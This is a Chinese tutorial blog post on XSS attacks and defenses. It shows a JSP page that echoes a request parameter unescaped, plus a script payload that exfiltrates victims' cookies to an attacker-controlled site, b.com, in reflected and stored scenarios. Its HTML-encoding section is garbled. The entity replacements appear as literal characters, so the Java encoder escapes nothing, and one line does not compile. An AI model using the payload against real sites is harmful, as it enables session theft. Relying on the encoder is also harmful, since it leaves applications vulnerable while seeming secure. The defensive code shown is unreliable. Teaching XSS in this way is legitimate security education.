XSS 攻击与防御

转自：https://blog.csdn.net/ghsau/article/details/17027893

XSS 又称 CSS，全称 Cross SiteScript，跨站脚本攻击，是 Web 程序中常见的漏洞，XSS 属于被动式且用于客户端的攻击方式。其原理是攻击者向有  XSS 漏洞的网站中输入（传入）恶意的 HTML 代码，当其他用户浏览该网站时，这段 HTML 代码会自动执行，从而达到攻击的目的。比如：盗取用户 Cookie、破坏页面结构、重定向到其他网站等。

XSS 攻击

XSS 攻击之前，先找到一个存在 XSS 漏洞的网站，XSS 漏洞分为两种：一种是 DOM Based XSS 漏洞，另一种是 Stored XSS 漏洞。理论上，所有可以输入的地方没有对输入的数据进行处理的话，都会存在 XSS 漏洞，漏洞的危害取决于攻击代码的威力，攻击代码也不局限于 script。

DOM Based XSS

DOM Based XSS 是一种基于网页 DOM 结构的攻击，该攻击特点是中招的人是少数人。

场景一：

当我登录 a.com 后，我发现它的页面某些内容是根据 URL 中的一个叫 content 参数直接显示的，猜测它的页面处理可能是这样：

<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>

<!DOCTYPEhtmlPUBLIC"-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> 

<html>   

    <head>       

        <title>XSS测试</title>   

    </head>   

    <body>       

        页面内容：<%=request.getParameter("content")%>       

    </body>

</html>   

我知道了 Tom 也注册了该网站，并且知道了他的邮箱(或者其它能接收信息的联系方式)，我做一个超链接发给他，超链接地址为：http://www.a.com?content=<script>window.open(“www.b.com?param=”+document.cookie)</script>，当 Tom 点击这个链接的时候(假设他已经登录 a.com )，浏览器就会直接打开 b.com，并且把 Tom 在 a.com 中的 cookie 信息发送到 b.com，b.com 是我搭建的网站，当我的网站接收到该信息时，我就盗取了Tom 在 a.com 的 cookie 信息，cookie 信息中可能存有登录密码，攻击成功！这个过程中，受害者只有 Tom 自己。那当我在浏览器输入 a.com?content=<script>alert(“xss”)</script>，浏览器展示页面内容的过程中，就会执行我的脚本，页面输出 xss 字样，这是攻击了我自己，那我如何攻击别人并且获利呢？

Stored XSS

Stored XSS 是存储式 XSS 漏洞，由于其攻击代码以及存储到服务器上或数据库中，所以受害者是很多人。

场景二：

a.com 可以发文章，我登录后在 a.com 中发布了一篇文章，文章中包含了恶意代码，<script>window.open(“www.b.com?param=”+document.cookie)</script>，保存文章。这时 Tom 和 Jack 看到了我发布的文章，当在查看我的文章时就都中招了，他们的 cookie 信息都发送到了我的服务器上，攻击成功！这个过程中，受害者是多个人。

Stored XSS 漏洞危害性更大，危害面更广。

XSS 防御

完善的过滤体系

永远不相信用户的输入。需要对用户的输入进行处理，只允许输入合法的值，其他值一概滤掉

HTML encode

假如某些情况下，我们不能对用户数据进行严格的过滤，那我们也需要对标签进行转换。

比如用户输入：<script>window.location.href=”http://www.baidu.com”;</script>，保存后最终存储的会是：<script>window.location.href="http://www.baidu.com"</script>在展现时，浏览器会对这些字符转换成文本内容显示，而不是一段可执行的代码。

其他

下面提供两种 HTML encode 方法。

1. 使用 Apache 的 commons-lang.jar

StringEscapeUtils.escapeHtml(str);  // 汉字会转换成对应的ASCII码，空格不转换

2. 自己实现转换，只转换部分字符

private static String htmlEncode(char c) { 

    switch(c) {     

    case '&':         

        return "&";     

    case '<':         

        return "<";     

    case '>':         

        return ">";     

    case '"':         

        return """;     

    case ' ':           

        return " ";     

    default:         

        return c + ""; 

    }

}

/** 对传入的字符串str进行Html encode转换 */

public static String htmlEncode(String str) { 

    if (str ==null || str.trim().equals("")) 

        return str; 

    StringBuilder encodeStrBuilder = new StringBuilder(); 

    for (int i = 0, len = str.length(); i < len; i++) {              encodeStrBuilder.append(htmlEncode(str.charAt(i))); 

    } 

    return encodeStrBuilder.toString();

}